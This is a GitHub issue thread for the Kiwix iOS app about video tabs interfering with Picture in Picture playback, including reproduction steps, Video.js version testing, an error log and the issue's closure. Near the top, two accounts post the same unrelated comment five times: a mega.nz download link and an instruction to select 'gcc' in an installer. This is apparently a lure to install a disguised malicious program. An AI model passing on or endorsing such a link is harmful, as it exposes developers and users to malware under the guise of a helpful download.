### ISSUE TITLE
Multiple tabs with video content collide with Picture in Picture

### ISSUE THREAD

**Issue by BPerlakiH** [kiwix/kiwix-apple#953]
## Used content:
- [TED 3d Printing, 30 Jul 2024](https://download.kiwix.org/zim/ted/ted_mul_3d-printing_2024-07.zim.meta4)
- [TED humanities 2 Aug 2024](https://download.kiwix.org/zim/ted/ted_mul_humanities_2024-08.zim.meta4)

## Steps to reproduce:
- We need 2 tabs (A and B) both with video content, each of them needs to be at a non-zero progress position (eg: at the middle of the stream)
- From tab A start the video, launch in full screen, switch to picture in picture
- Select tab B
- Notice that tab B is "fixed up" (by play and pause), but that pauses the picture in picture (PIP) playback

## Recording:
https://github.com/user-attachments/assets/7a22631f-1073-4e1a-b7ee-e30f629fcbcf

Initial investigation:
It seems we have opposing forces:
- if a video content re-appears we want to "fix it" with play + pause, so it's not causing [the black screen issue](https://github.com/kiwix/kiwix-apple/issues/772)
- currently we only fixing it if the current tab's browser is not using Picture in Picture (and has some progress, meaning it's not the poster)
- the issue is that the picture in picture video can come from another tab, further more it can even come from a tab, that has been closed

## Possible solution:
Unfortunately from swift there seems to be no easy way to get to the picture in picture video player that was created by the WKWebView
With some not so elegant JS code, by listening on each video elements [entering picture and picture](https://developer.mozilla.org/en-US/docs/Web/API/HTMLVideoElement/enterpictureinpicture_event), and [leaving picture in picture events](https://developer.mozilla.org/en-US/docs/Web/API/HTMLVideoElement/leavepictureinpicture_event), but we need to pass these back from the individual webView instances to swift and gather them, so we can track if we have any picture in picture or not.
This way we could potentially fix the current issue, BUT:
- it would open up the possibility to have [the black screen issue](https://github.com/kiwix/kiwix-apple/issues/772) again. Under the condition of foregrounding the Kiwix app and landing on tab B, while tab A's picture in picture video was playing all the time
- it would create even more JS hacks, similar and based on [the ones we wished not to have](https://github.com/kiwix/kiwix-apple/issues/939).

## Question: 
I think it's a rare corner case, so worth to discuss if fixing it in a very complicate way is the way to go.

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by kelson42** [comment]
@BPerlakiH Can you please update briefly the issue? Is the issue description still valid in this form? Does the problem still occur with a recent update of this very same file used to create the issue?

**Comment by BPerlakiH** [comment]
After looking into this, [the source of the problem was here](https://github.com/kiwix/kiwix-apple/pull/801).
We did a fix for that, by quickly playing and pausing the video. This issue is a side-effect of that solution. For now I think it is still better to have this very rare case, than the original issue we fixed. I've checked, the original issue still remains without our fix.
Finding a better fix than that might be very time consuming, so probably not worth it as part of the 3.10 milestone.

**Comment by kelson42** [comment]
@BPerlakiH To me, #772 has not been fixed properly and this is an unsurprising side effect of a bad fix. We should reassess #772 IMHO. Can you please confirm that without your hacky patch, we still have the same behaviour with latest version of Kiwix code base and iOS18?

**Comment by BPerlakiH** [comment]
So far I can confirm that it is still a problem on iPhone with the latest code base without the patch (even with newer TED content from 2025-06). Originally we were testing it on: iOS 17.4.1, as of iOS 17.7.2 it is still an issue. Will be able to test it on iOS 18 over the weekend.

**Comment by BPerlakiH** [comment]
As for the original issue, I looked into it a bit more. It seems that even the newer TED content, like "TED coral reefs" from 26 Apr 2025, is still using Video.js 7.8.1.
Several iOS related issues have been fixed in Video.JS 8.
I have tested the videojs.com on iPhone iOS 17.7.2, and they have a similar issue, that black screen is appearing instead of the paused video for a quick moment when switching back to the browser from another high-consuming application, but it is resolved immediately, so maybe they do something else than play+pause...

@kelson42 or @benoit74 do you know if we have a ZIM video content with newer / latest Video JS?

**Comment by kelson42** [comment]
@BPerlakiH I don't think we have such a ZIM file. @benoit74 Younconfirm? Any chance to update video.js to latest version?

**Comment by kelson42** [comment]
@BPerlakiH @benoit74 I have open issues to bump-up versions of Video.js for both TED and Youtube. Really hope this will allow to get rid of #772 and finally fix this issue(s).

**Comment by benoit74** [comment]
Youtube is already on Video.JS 8.17.4 since about ~10 months or so.

**Comment by kelson42** [comment]
@benoit74 Thank you the PR on TED and Youtube scrapers. Let merge them and generate quickly a ZIM file with them so @BPerlakiH can move forward with his part of the work.

**Comment by benoit74** [comment]
You have a new TED ZIM for testing at https://mirror.download.kiwix.org/zim/.hidden/dev/ted_mul_wildlife_2025-07.zim ; I will validate the ZIM on all readers before releasing

**Comment by benoit74** [comment]
And one Youtube ZIM for testing at https://mirror.download.kiwix.org/zim/.hidden/dev/avanti-3dimensional-geometry_2025-07.zim ; testing as well on all readers

**Comment by benoit74** [comment]
FYI, both ZIMs look fine on all readers, so I will release both scrapers. I do not plan to force a refresh of all ZIMs for now but let them refresh on their own schedule.

**Comment by kelson42** [comment]
@benoit74 @BPerlakiH I made a test with these 2 ZIM files of above, nightly version of Kiwix and iPadOS 2026 Beta3. I can not reproduce the issue and I see no playback problem around PiP and second video displayed in tab. This bug seems fixed to me, at least around my test configuration.

**Comment by kelson42** [comment]
@BPerlakiH Can we have please an update on this issue?

**Comment by BPerlakiH** [comment]
I cannot reproduce it using the exact steps from the original issue with TED videos from 2025, using iPad on iOS 18.3.1, or using the videos provided by @benoit74.

I can however reproduce the same thing, if Picture In Picture (PiP) is already playing, instead of just switching to tab B, I switch to tab B, PiP is still playing, but if I background / foreground the app, it will stop PiP the same way.

Once I took out the original fix this very issue is gone.

There were very rare cases where the video stopped or did not display the paused frame:

<img width="1280" height="960" alt="Image" src="https://github.com/user-attachments/assets/b3f1b1a8-a479-48d1-a13c-5cb651445aee" />
<img width="1280" height="960" alt="Image" src="https://github.com/user-attachments/assets/bfe77a58-4936-4611-b06a-e1cb670885fe" />
<img width="1280" height="960" alt="Image" src="https://github.com/user-attachments/assets/20471d6a-b350-4d30-8276-104f6880ba6d" />

Unfortunately I could not found those exact videos from 2024, I did found though the P21 AC Circuits from 27 Jun 2024, which is roughly the same period. Based on testing with that as well, without the original fix (for the black screen), it works better. So my impression is that the original issue was fixed in iOS 18, and we can drop the workaround from iOS 18 and up.

**TLDR: From iOS 18 it works better without the original fix!**

**Comment by BPerlakiH** [comment]
The above error messages come with this JS error via the browser inspector:

```
VIDEOJS:"ERROR:""(CODE:3 MEDIA_ERR_DECODE)""The media playback was aborted due to a corruption problem or because the media used features your browser did not support."
i

code: 3

message: "The media playback was aborted due to a corruption problem or because the media used features your browser did not support."

i Prototype

MEDIA_ERR_ABORTED: 1

MEDIA_ERR_CUSTOM: 0

MEDIA_ERR_DECODE: 3

MEDIA_ERR_ENCRYPTED: 5

MEDIA_ERR_NETWORK: 2

MEDIA_ERR_SRC_NOT_SUPPORTED: 4

code: 0

constructor: function(e)

message: ""

metadata: null

status: null
```

**Comment by BPerlakiH** [comment]
<img width="1302" height="664" alt="Image" src="https://github.com/user-attachments/assets/becf2a1e-51dc-41d0-a789-b43cebe08125" />

**Comment by BPerlakiH** [comment]
Sure way to reproduce:
- start playing the content without full screen
- background app
- foreground app
- play again, and within a 1 sec you will have the above error

It is consistent on iOS 18, with or without the original fix.

**Comment by kelson42** [comment]
> @benoit74 @BPerlakiH I made a test with these 2 ZIM files of above, nightly version of Kiwix and iPadOS 2026 Beta3. I can not reproduce the issue and I see no playback problem around PiP and second video displayed in tab. This bug seems fixed to me, at least around my test configuration.

I retest today with same conditions, and don't have the same behaviour anymore. Each time I load an other page (not a video or a page with a video) of the same ZIM for which I have a video running in PiP mode, then it just stop the PiP....

After testing again, I'm not sure if the behaviour has changed... but we have a bug definitly. I will open a dedicated issue.

Edit: After retesting again with Youtube and browser, it works actually the same. So it seems normal that you have to keep the tab with article with video running in PiP... otherwise PiP disappear.

**Comment by BPerlakiH** [comment]
After throughout testing **taking out the original fix is not an option!** 
**Using the very latest ZIM files, it failed with a black screen on both iOS 17 and iOS 18:**

Which means the latest videoJS did not fix our original problem.

**iPhone iOS 17:**

<img width="296" height="640" alt="Image" src="https://github.com/user-attachments/assets/050955cc-b8e7-4731-b10b-61dab465ba17" />

**iPad iOS 18**

<img width="640" height="480" alt="Image" src="https://github.com/user-attachments/assets/7d585395-c0cb-44d9-8699-c604418b633a" />

**Comment by kelson42** [comment]
Cinsidering Video.js with IPadOspS 26 is fixed, I close the issue. We could update the section "know issuel of the readme for iOS 17 and 18... but because the reproduction steps are not so easy and because nobody else has complained... I think this is probably better not to do it.
